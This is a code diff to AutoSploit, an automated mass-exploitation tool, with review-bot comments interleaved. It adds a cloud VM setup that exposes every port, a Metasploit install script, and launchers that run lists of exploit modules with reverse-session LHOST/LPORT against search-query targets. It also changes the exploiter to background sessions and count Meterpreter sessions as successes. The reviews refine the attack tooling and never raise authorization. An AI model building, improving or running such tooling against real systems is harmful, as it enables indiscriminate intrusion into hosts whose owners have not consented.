diff --git a/Vagrant/Vagrantfile b/Vagrant/Vagrantfile
new file mode 100644
index 0000000..c427e3a
--- /dev/null
+++ b/Vagrant/Vagrantfile
@@ -0,0 +1,28 @@
+# Use as a strating point to spin up a box in lightsail.
+# the vagrant-lightsail plugin is required
+# You probably also need to:
+# - Configure the ssh keys path
+# - Install and configure the aws-cli package
+
+Vagrant.configure('2') do |config|
+ config.vm.synced_folder ".", "/vagrant", type: "rsync",
+ rsync__exclude: ".git/",
+ rsync__auto: true
+
+ config.ssh.private_key_path = '/path/to/id_rsa'
+ config.ssh.username = 'ubuntu'
+ config.vm.box = 'lightsail'
+ config.vm.box_url = 'https://github.com/thejandroman/vagrant-lightsail/raw/master/box/lightsail.box'
+ config.vm.hostname = 'autosploit-launcher'
+
+ config.vm.provider :lightsail do |provider, override|
+ provider.port_info = [{ from_port: 0, to_port: 65535, protocol:
+ 'all' }]
+ provider.keypair_name = 'id_rsa'
+ provider.bundle_id = 'small_1_0'
+ end
+
+ config.vm.provision "bootstrap", type: "shell", run: "once" do |s|
+ s.path = "./bootstrap/bootstrap.sh"
+ end
+end
diff --git a/Vagrant/bootstrap/bootstrap.sh b/Vagrant/bootstrap/bootstrap.sh
new file mode 100644
index 0000000..5f0a31a
--- /dev/null
+++ b/Vagrant/bootstrap/bootstrap.sh
@@ -0,0 +1,20 @@
+#!/usr/bin/env bash
+
+
+echo "Yolosploit configurator 2.42"
+sudo apt-get --yes update
+sudo apt-get --yes upgrade
+
+echo "Installing metasploit. BE PATIENT (5 min max?)"
+wget --quiet https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run
+chmod +x metasploit-latest-linux-x64-installer.run
+sudo ./metasploit-latest-linux-x64-installer.run --unattendedmodeui none --prefix /opt/msf --mode unattended
+
+echo "Installing pyhton2"
+sudo apt-get --yes install python python-pip python-virtualenv git
+
+sudo apt-get --yes install fish
+sudo chsh -s /usr/bin/fish ubuntu
+
+cd ~
+git clone https://github.com/NullArray/AutoSploit
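Review bot: `provider.port_info = [{ from_port: 0, to_port: 65535, protocol: 'all' }]` exposes every TCP and UDP port of the Lightsail instance to the internet, while the box only needs inbound SSH plus the Metasploit handler port the run scripts pass as LPORT (4444 in dryrun_autosploit.sh, argument 2 in run_autosploit.sh). Narrow the rule to what is used, e.g. `provider.port_info = [{ from_port: 22, to_port: 22, protocol: 'tcp' }, { from_port: 4444, to_port: 4444, protocol: 'tcp' }]`, and say in the header comment that the second entry must match the LPORT you launch with. `config.ssh.private_key_path = '/path/to/id_rsa'` is a placeholder that makes `vagrant up` fail until edited; the header mentions it, but a `# TODO: point at the private key matching provider.keypair_name` on that line is easier to find.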
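Review bot: The Metasploit installer is fetched with `wget` and then executed as root on the `sudo ./metasploit-latest-linux-x64-installer.run ...` line without any checksum or signature check, so a truncated or tampered download runs unverified code on the box; pin a specific release and verify it first, e.g. `echo "${MSF_SHA256}  metasploit-latest-linux-x64-installer.run" | sha256sum -c - || exit 1` before the install line. The script has no `set -euo pipefail`, so if `wget` fails the `chmod +x` and install lines still run against a missing file and the provisioner reports success. If the Vagrant shell provisioner runs privileged (its default, as far as I can tell), `cd ~` resolves to /root and AutoSploit is cloned there rather than into the `ubuntu` home that the preceding `chsh` line targets — `cd /home/ubuntu && sudo -u ubuntu git clone https://github.com/NullArray/AutoSploit` makes the destination explicit.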
diff --git a/dryrun_autosploit.sh b/dryrun_autosploit.sh
new file mode 100644
index 0000000..28f126a
--- /dev/null
+++ b/dryrun_autosploit.sh
@@ -0,0 +1,28 @@
+#!/usr/bin/env bash
+
+
+if [[ $# -lt 2 ]]; then
+ echo "Syntax:"
+ echo -e "\t./dryrun_autosploit.sh "
+ exit 1
+fi
+
+WHITELIST=$1
+SEARCH_QUERY=$2
+LPORT=4444
+
+LHOST=`dig +short @resolver1.opendns.com myip.opendns.com`
+TIMESTAMP=`date +%s`
+
+
+echo "python autosploit.py -s -c -q \"${SEARCH_QUERY}\" --overwrite \
+ --whitelist $WHITELIST -e \
+ -C \"msf_autorun_${TIMESTAMP}\" $LHOST $LPORT \
+ --exploit-file-to-use etc/json/default_modules.json \
+ --dry-run"
+
+python autosploit.py -s -c -q "${SEARCH_QUERY}" --overwrite \
+ --whitelist $WHITELIST -e \
+ -C "msf_autorun_${TIMESTAMP}" $LHOST $LPORT \
+ --exploit-file-to-use etc/json/default_modules.json \
+ --dry-run
diff --git a/etc/json/default_modules.json b/etc/json/default_modules.json
index f30a51b..e59d795 100644
--- a/etc/json/default_modules.json
+++ b/etc/json/default_modules.json
@@ -146,7 +146,6 @@
 "auxiliary/admin/cisco/vpn_3000_ftp_bypass",
 "exploit/bsdi/softcart/mercantec_softcart ",
 "exploit/freebsd/misc/citrix_netscaler_soap_bof",
- "exploit/freebsd/samba/trans2open",
 "exploit/linux/ftp/proftp_sreplace ",
 "exploit/linux/http/dcos_marathon",
 "exploit/linux/http/f5_icall_cmd",
@@ -183,7 +182,6 @@
 "exploit/linux/proxy/squid_ntlm_authenticate",
 "exploit/linux/samba/lsa_transnames_heap",
 "exploit/linux/samba/setinfopolicy_heap",
- "exploit/linux/samba/trans2open",
 "exploit/multi/elasticsearch/script_mvel_rce",
 "exploit/multi/elasticsearch/search_groovy_script",
 "exploit/multi/http/atutor_sqli",
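Review bot: `LHOST` is taken from an external DNS lookup with no check that it returned anything; if `dig` fails or is blocked, `$LHOST` expands to nothing and `$LPORT` slides into the host position of the `python autosploit.py ... $LHOST $LPORT` invocation. Guard it with `LHOST=$(dig +short @resolver1.opendns.com myip.opendns.com)` followed by `[[ -z "$LHOST" ]] && { echo "could not determine LHOST" >&2; exit 1; }`, and quote `"$WHITELIST"` so a path containing spaces is passed as one argument. The usage line `echo -e "\t./dryrun_autosploit.sh "` names no arguments — it looks like angle-bracketed placeholders were lost — so spell them out, e.g. `<whitelist-file> <search-query>`.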
@@ -263,27 +261,6 @@
 "exploit/windows/smb/ipass_pipe_exec",
 "exploit/windows/smb/smb_relay",
 "auxiliary/sqli/oracle/jvm_os_code_10g",
- "auxiliary/sqli/oracle/jvm_os_code_11g",
- "auxiliary/fuzzers/dns/dns_fuzzer",
- "auxiliary/fuzzers/ftp/client_ftp",
- "auxiliary/fuzzers/ftp/ftp_pre_post",
- "auxiliary/fuzzers/http/http_form_field",
- "auxiliary/fuzzers/http/http_get_uri_long",
- "auxiliary/fuzzers/http/http_get_uri_strings",
- "auxiliary/fuzzers/ntp/ntp_protocol_fuzzer",
- "auxiliary/fuzzers/smb/smb2_negotiate_corrupt",
- "auxiliary/fuzzers/smb/smb_create_pipe",
- "auxiliary/fuzzers/smb/smb_create_pipe_corrupt",
- "auxiliary/fuzzers/smb/smb_negotiate_corrupt ",
- "auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt",
- "auxiliary/fuzzers/smb/smb_tree_connect",
- "auxiliary/fuzzers/smb/smb_tree_connect_corrupt",
- "auxiliary/fuzzers/smtp/smtp_fuzzer",
- "auxiliary/fuzzers/ssh/ssh_kexinit_corrupt",
- "auxiliary/fuzzers/ssh/ssh_version_15",
- "auxiliary/fuzzers/ssh/ssh_version_2",
- "auxiliary/fuzzers/ssh/ssh_version_corrupt",
- "auxiliary/fuzzers/tds/tds_login_corrupt",
- "auxiliary/fuzzers/tds/tds_login_username"
+ "auxiliary/sqli/oracle/jvm_os_code_11g"
 ]
 }
diff --git a/etc/json/fuzzers.json b/etc/json/fuzzers.json
new file mode 100644
index 0000000..b606973
--- /dev/null
+++ b/etc/json/fuzzers.json
@@ -0,0 +1,25 @@
+{
+ "exploits": [
+ "auxiliary/fuzzers/dns/dns_fuzzer",
+ "auxiliary/fuzzers/ftp/client_ftp",
+ "auxiliary/fuzzers/ftp/ftp_pre_post",
+ "auxiliary/fuzzers/http/http_form_field",
+ "auxiliary/fuzzers/http/http_get_uri_long",
+ "auxiliary/fuzzers/http/http_get_uri_strings",
+ "auxiliary/fuzzers/ntp/ntp_protocol_fuzzer",
+ "auxiliary/fuzzers/smb/smb2_negotiate_corrupt",
+ "auxiliary/fuzzers/smb/smb_create_pipe",
+ "auxiliary/fuzzers/smb/smb_create_pipe_corrupt",
+ "auxiliary/fuzzers/smb/smb_negotiate_corrupt ",
+ "auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt",
+ "auxiliary/fuzzers/smb/smb_tree_connect",
+ "auxiliary/fuzzers/smb/smb_tree_connect_corrupt",
+ "auxiliary/fuzzers/smtp/smtp_fuzzer",
+ "auxiliary/fuzzers/ssh/ssh_kexinit_corrupt",
+ "auxiliary/fuzzers/ssh/ssh_version_15",
+ "auxiliary/fuzzers/ssh/ssh_version_2",
+ "auxiliary/fuzzers/ssh/ssh_version_corrupt",
+ "auxiliary/fuzzers/tds/tds_login_corrupt",
+ "auxiliary/fuzzers/tds/tds_login_username"
+ ]
+}
diff --git a/lib/exploitation/exploiter.py b/lib/exploitation/exploiter.py
index 97e3e6e..55f94bb 100644
--- a/lib/exploitation/exploiter.py
+++ b/lib/exploitation/exploiter.py
@@ -121,7 +121,7 @@ def start_exploit(self):
 "setg threads 20\n"
 "set rhost {rhost}\n"
 "set rhosts {rhosts}\n"
- "run\n"
+ "run -z\n"
 "exit\n"
 )
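Review bot: `"auxiliary/fuzzers/smb/smb_negotiate_corrupt ",` has a trailing space inside the string; if the exploiter formats the module path verbatim into the msfconsole script (the `use` line is outside this diff), that entry is unlikely to resolve to the module. The same trailing-space entries exist among the context lines of default_modules.json, but this file is new, so correct it here: `"auxiliary/fuzzers/smb/smb_negotiate_corrupt",`. JSON cannot carry a comment, so the README or the loader is where to record that fuzzers are kept out of the default module run and must be selected explicitly with `--exploit-file-to-use etc/json/fuzzers.json`.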
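Review bot: `"run -z\n"` is now emitted for every module in the list, but default_modules.json mixes `auxiliary/` and `exploit/` modules, and `-z` (do not interact with the session after exploitation) is an option of the exploit `run` command; I am not certain the auxiliary dispatcher accepts it, so verify against the Metasploit build that bootstrap.sh installs, or emit `-z` only when the module path starts with `exploit/`. Whichever way it goes, the template deserves a comment such as `# -z: keep the session in the background so the loop is not stuck in an interactive shell`. The enclosing `start_exploit` starts before this hunk, so where the module path is substituted into this template is not visible here.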
@@ -157,11 +157,18 @@ def start_exploit(self):
 ansi_escape = re.compile(r'\x1B\[[0-?]*[ -/]*[@-~]')
 msf_output_lines = linesep.join([ansi_escape.sub('', x) for x in output if re.search('\[.\]', x)])
- msf_wins = linesep.join([ansi_escape.sub('', x) for x in output if re.search('\[\+\]', x)])
- msf_fails = linesep.join([ansi_escape.sub('', x) for x in output if re.search('\[-\]', x)])
- win_total += len(msf_wins)
- fail_total += len(msf_fails)
+ msf_wins = linesep.join([ansi_escape.sub('', x) for x in msf_output_lines if re.search('\[\+\]', x) or
+ 'Meterpreter' in x or
+ 'Session' in x or
+ 'Sending stage' in x])
+
+ msf_fails = linesep.join([ansi_escape.sub('', x) for x in msf_output_lines if re.search('\[-\]', x)])
+
+ if len(msf_wins):
+ win_total += 1
+ if len(msf_fails):
+ fail_total += 1
 csv_file = csv.writer(f, quoting=csv.QUOTE_ALL)
 csv_file.writerow([rhost,
diff --git a/run_autosploit.sh b/run_autosploit.sh
new file mode 100644
index 0000000..b573908
--- /dev/null
+++ b/run_autosploit.sh
@@ -0,0 +1,16 @@
+#!/usr/bin/env bash
+
+
+if [[ $# -lt 2 ]]; then
+ echo "Syntax:"
+ echo -e "\t./run_autosploit.sh "
+ exit 1
+fi
+
+WHITELIST=$1
+LPORT=$2
+
+LHOST=`dig +short @resolver1.opendns.com myip.opendns.com`
+TIMESTAMP=`date +%s`
+
+python autosploit.py --whitelist $WHITELIST -e -C "msf_autorun_${TIMESTAMP}" $LHOST $LPORT -f etc/json/default_modules.json
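Review bot: `msf_output_lines` is a string (it is the `linesep.join(...)` result two lines above), so `for x in msf_output_lines` in the new `msf_wins` and `msf_fails` comprehensions iterates single characters; `re.search('\[\+\]', x)`, `'Meterpreter' in x` and `re.search('\[-\]', x)` can never match a one-character string, which leaves both joins empty and `win_total`/`fail_total` never incremented. Keep the filtered lines as a list and iterate that in both comprehensions; the inner `ansi_escape.sub` then becomes redundant because the lines were already stripped. The `'Session'` and `'Sending stage'` substrings are case-sensitive and will also match informational `[*]` lines, so the heuristic should be stated in a comment rather than left implicit. `start_exploit` continues outside this hunk.
```python
filtered = [ansi_escape.sub('', x) for x in output if re.search(r'\[.\]', x)]
msf_output_lines = linesep.join(filtered)
# Heuristic: a host counts as a win when any line carries [+] or a session/stage message.
msf_wins = linesep.join([x for x in filtered if re.search(r'\[\+\]', x) or
                         'Meterpreter' in x or
                         'Session' in x or
                         'Sending stage' in x])
msf_fails = linesep.join([x for x in filtered if re.search(r'\[-\]', x)])
# … unchanged: win_total / fail_total increments and CSV row …
```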
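Review bot: `LHOST` comes from `dig` with no emptiness check and `LPORT=$2` is not validated, so a failed lookup silently shifts `$LPORT` into the host argument of the final `python autosploit.py` line and a non-numeric second argument reaches Metasploit unchecked. Add `[[ -z "$LHOST" ]] && { echo "could not determine LHOST" >&2; exit 1; }` after the lookup, `[[ "$LPORT" =~ ^[0-9]+$ ]] || { echo "LPORT must be numeric" >&2; exit 1; }` after the assignment, and quote `"$WHITELIST"`. Unlike dryrun_autosploit.sh this script has no `--dry-run`, so a header comment such as `# Launches live exploitation against every host in the whitelist file; run dryrun_autosploit.sh first.` would make the difference obvious. The usage line `echo -e "\t./run_autosploit.sh "` names no arguments and appears to have lost its placeholders.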